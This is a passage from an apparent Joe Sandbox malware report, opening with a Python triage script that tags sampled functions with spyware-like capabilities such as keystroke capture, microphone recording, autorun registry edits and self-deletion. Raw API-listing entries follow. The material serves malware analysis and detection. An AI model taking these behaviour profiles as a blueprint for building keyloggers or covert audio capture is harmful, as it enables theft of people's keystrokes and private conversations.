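The entries above (the keystroke-translation routine with its [AltL]/[AltR] and [CtrlL]/[CtrlR] tags, the waveIn audio capture, the RegOpenKeyExW/RegDeleteValueW pair on Policies\Explorer\Run, and the DeleteFileW/RemoveDirectoryW and TerminateProcess/WaitForSingleObject cleanup routines) are the raw material for a per-function capability summary. The Python below is an added example, not Joe Sandbox code and not part of this report: it parses the `APIs`, `String ID` and `Instruction Fuzzy Hash` lines of such entries, tags each function with capabilities from a small rule table of this example's own making (not Joe Sandbox signatures), and keys the result on the fuzzy hash so it can be pivoted to other samples. The embedded excerpt is a constructed copy of entries from this page with the layout indentation removed and some argument lists abbreviated; treating `$` as the separator between strings in a `String ID` line is an assumption inferred from how those lines read.

```python
"""Capability triage over Joe Sandbox "APIs" function entries.

Added example; not Joe Sandbox code. REPORT_EXCERPT is a constructed copy of
entries from this page (indentation removed, some argument lists abbreviated).
RULES are this example's own heuristics. Assumption: '$' separates strings in
a "String ID" line.
"""
import re
from dataclasses import dataclass, field

REPORT_EXCERPT = r"""APIs
• GetKeyState.USER32(00000011), ref: 0040AD5B
  • Part of subcall function 00409B10: GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
  • Part of subcall function 00409B10: GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
  • Part of subcall function 00409B10: ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409B8A
• String ID: [AltL]$[AltR]
• Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
APIs
• waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
• waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
• String ID: T=G
• Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
APIs
• RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?), ref: 00412988
• RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
• String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
• Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
APIs
• DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
• RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
• String ID: pth_unenc
• Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
APIs
• TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
• WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
• String ID: pth_unenc
• Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
"""

# Matches "• Name.MODULE(" and "• Part of subcall function XXXX: Name.MODULE(" lines.
API_RE = re.compile(
    r"^\s*•\s+(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"([A-Za-z_]\w*)\.([A-Z0-9]+)(?:\(|\s|$)"
)

# (capability, APIs that must all be present, substrings of which one must appear in the strings)
RULES = [
    ("keystroke capture", {"GetKeyboardState", "ToUnicodeEx"}, ()),
    ("microphone capture", {"waveInPrepareHeader", "waveInAddBuffer"}, ()),
    ("autorun policy key edit", {"RegOpenKeyExW", "RegDeleteValueW"}, ("Policies\\Explorer\\Run",)),
    ("self-removal", {"DeleteFileW", "RemoveDirectoryW"}, ()),
    ("process kill and wait", {"TerminateProcess", "WaitForSingleObject"}, ()),
]


@dataclass
class FunctionEntry:
    apis: set = field(default_factory=set)        # APIs called directly or via listed subcalls
    strings: list = field(default_factory=list)   # strings from the "String ID" line
    fuzzy_hash: str = ""                          # Instruction Fuzzy Hash, the entry's handle
    capabilities: list = field(default_factory=list)


def parse_entries(report_text):
    """Split the text into entries, one per "APIs" heading, collecting each entry's fields."""
    entries, current = [], None
    for line in report_text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = FunctionEntry()
            entries.append(current)
            continue
        if current is None:       # headings such as "Strings" before the first entry
            continue
        m = API_RE.match(line)
        if m:
            current.apis.add(m.group(1))
        elif stripped.startswith("• String ID:"):
            raw = stripped[len("• String ID:"):].strip()
            current.strings = [s for s in raw.split("$") if s]
        elif stripped.startswith("• Instruction Fuzzy Hash:"):
            current.fuzzy_hash = stripped.split(":", 1)[1].strip()
    return entries


def triage(report_text):
    """Parse entries and tag each with every rule whose APIs (and strings, if any) it satisfies."""
    entries = parse_entries(report_text)
    for entry in entries:
        entry.capabilities = [
            cap for cap, apis, subs in RULES
            if apis <= entry.apis
            and (not subs or any(sub in s for s in entry.strings for sub in subs))
        ]
    return entries


def summarize(entries):
    """Capability -> fuzzy hashes of the functions showing it, for pivoting to other samples."""
    summary = {}
    for entry in entries:
        for cap in entry.capabilities:
            summary.setdefault(cap, []).append(entry.fuzzy_hash)
    return summary


if __name__ == "__main__":
    for cap, hashes in summarize(triage(REPORT_EXCERPT)).items():
        print(f"{cap}: {', '.join(hashes)}")
```

The registry rule deliberately requires both the API pair and the Policies\Explorer\Run string: RegOpenKeyExW followed by RegDeleteValueW on its own is ordinary cleanup code, whereas a value removed from that policy autorun key is worth a closer look. Extend RULES with further API combinations from the report as needed.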
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                                                                                        • GetLastError.KERNEL32 ref: 0043FB02
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1717984340-0
                                                                                                                        • Opcode ID: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                                                                        • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                                                                                        • Opcode Fuzzy Hash: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                                                                        • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759